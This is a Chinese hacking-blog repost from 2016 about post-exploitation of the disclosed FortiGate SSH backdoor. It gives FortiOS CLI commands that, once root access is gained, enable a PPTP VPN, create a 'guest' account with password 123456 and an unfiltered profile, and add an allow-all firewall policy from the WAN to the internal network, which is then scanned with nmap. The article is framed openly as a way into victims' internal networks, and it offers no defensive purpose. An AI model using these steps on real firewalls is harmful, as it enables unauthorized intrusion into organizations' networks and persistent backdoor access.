记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

飞塔SSH后门 进一步利用方法

2016-01-14 02:10

from:tools.pwn.ren

昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
vpn服务来进入到内网中 ,从而进行进一步渗透。
0X00 先看下用户组

    1. show user group

e3235f0991e4f0dcd0592ff26b83da2e_75ba014a-bace-415d-bf80-d1ce8c688668-2[1]
0x01开启vpn

    1. config vpn pptp
      set status enable
      set eip 192.168.200.100
      set sip 192.168.200.1
      set usrgrp Guest-group
      end
      config user local
      edit "guest"
      set type password
      set passwd 123456
      next
      end
      config user group
      edit "Guest-group"
      set profile "unfiltered"
      set member "guest"
      next
      end
      config firewall policy
      edit 9
      set srcintf "wan1"
      set dstintf "internal"
      set srcaddr "all"
      set dstaddr "all"
      set action accept
      set schedule "always"
      set service "ANY"
      next
      end

       

e3235f0991e4f0dcd0592ff26b83da2e_5KD1SI_HQ@U@3M71@V-2[1]
0x02 内网进一步渗透
查看路由表

    1. get router info routing-table all

e3235f0991e4f0dcd0592ff26b83da2e_bf5ca6ffc8c071efd98b8306df7f17e9-2[1]

这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪,想干嘛就干嘛。
e3235f0991e4f0dcd0592ff26b83da2e_e30d50f9c9499dc25620bbbdb799774a-2[1]
e3235f0991e4f0dcd0592ff26b83da2e_bf2c9c9ae42a5b5d660bb83498cad0c5-2[1]
e3235f0991e4f0dcd0592ff26b83da2e_642dea9ff5d3f4b15a2bcfc81f3bd7e9-1[1])

知识来源: 0day5.com/archives/3703

阅读:109866 | 评论:0 | 标签:Linux/Unix Backdoor fortigate OS ssh 后门 飞塔

想收藏或者和大家分享这篇好文章→复制链接地址

“飞塔SSH后门 进一步利用方法”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云